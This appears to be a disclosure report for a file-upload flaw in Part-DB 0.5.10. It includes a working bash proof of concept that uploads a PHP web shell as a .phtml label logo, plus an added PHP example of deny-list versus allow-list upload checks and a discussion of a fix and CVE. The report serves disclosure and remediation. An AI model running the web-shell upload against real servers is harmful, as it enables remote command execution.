OS Command Injection in part-db/part-db
Reported on
Feb 15th 2022
Description
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.
Proof of Concept
```bash
#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10   # web host and application path
echo "<?php system(id); ?>">POC.phtml   # PHP shell code, written to a .phtml file
# Upload the file as a label logo and extract the stored path from the response
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"
```
Impact
If successfully exploited, OS command injection could allow an attacker or malicious user to execute commands on the target with the same permissions as the exploited web server. Depending on the configuration of the target and the level of security hardening that has been conducted (or lack thereof), successful exploitation of this vulnerability could potentially result in the attacker gaining complete control of the vulnerable system, exfiltrating sensitive data, or performing privilege escalation / lateral movement.
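The root cause shown by the proof of concept is an upload check that refuses only the ".php" extension, so a ".phtml" file is stored in a web-served directory and executed wherever the server maps that extension to PHP. The following is an added example, not Part-DB's own code: it places that deny-list style of check beside an allow-list check that also sniffs the uploaded bytes and stores the file under a server-chosen name. The function names, the set of allowed image types and the sample inputs are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added example (not Part-DB code). Contrasts a deny-list extension check
// with an allow-list check that verifies content and renames the file.

/**
 * Deny-list check of the kind the report describes: only ".php" is refused.
 * Any other extension the web server happens to hand to the PHP interpreter
 * (for example .phtml, .phar, .php5) is accepted, which is the weakness.
 */
function denyListAcceptsName(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return $ext !== 'php';
}

/**
 * Allow-list check. Returns the server-chosen name to store the upload under,
 * or null if it is rejected. The client-supplied name is never reused: the
 * stored extension is derived from the detected content type, so a file that
 * is not really an image can never end up with a script extension.
 */
function allowListStoredName(string $clientName, string $contents): ?string
{
    // Only the image types a label logo needs (assumption for this example).
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

    // 1. The client-supplied extension must itself be an allowed image extension.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return null;
    }

    // 2. The bytes must really be one of those image types. The MIME type is
    //    sniffed from the content via fileinfo (libmagic), never taken from the
    //    client's Content-Type header or from the file name.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->buffer($contents);
    if (!isset($allowed[$detected])) {
        return null;
    }

    // 3. Store under a random server-generated name whose extension matches
    //    the detected type.
    return bin2hex(random_bytes(16)) . '.' . $allowed[$detected];
}

// Constructed sample inputs: a PHP script body and a genuine 1x1 GIF.
$scriptBody = "<?php echo 'not an image'; ?>";
$gifBytes   = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            . "\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00"
            . "\x01\x00\x00\x02\x02\x44\x01\x00\x3b";

$cases = [
    ['POC.phtml', $scriptBody],  // the report's case: deny-list lets it through
    ['logo.gif',  $scriptBody],  // image name, script body: content sniff catches it
    ['logo.gif',  $gifBytes],    // genuine image: accepted and renamed
];

foreach ($cases as [$name, $body]) {
    printf("%-10s deny-list: %-7s allow-list: %s\n",
        $name,
        denyListAcceptsName($name) ? 'accept' : 'reject',
        allowListStoredName($name, $body) ?? 'reject');
}
```

Validation alone should not be the only barrier: serving the upload directory with script execution disabled in the web server configuration (for Apache with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for that path) means a file that slips past the check is still delivered as static content rather than run.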
The possibility of the exploit depends somewhat on the server config (interpreting .phtml as a PHP file). The main problem is that Part-DB currently only blocks .php files, and not other potentially unsafe extensions as well. I will fix that.
@admin and @maintainer Please assign a CVE ID if applicable.
We are happy to assign a CVE, we just require the approval of the maintainer before we can action for you.
@maintainer - are you happy for us to assign and publish a CVE for this report?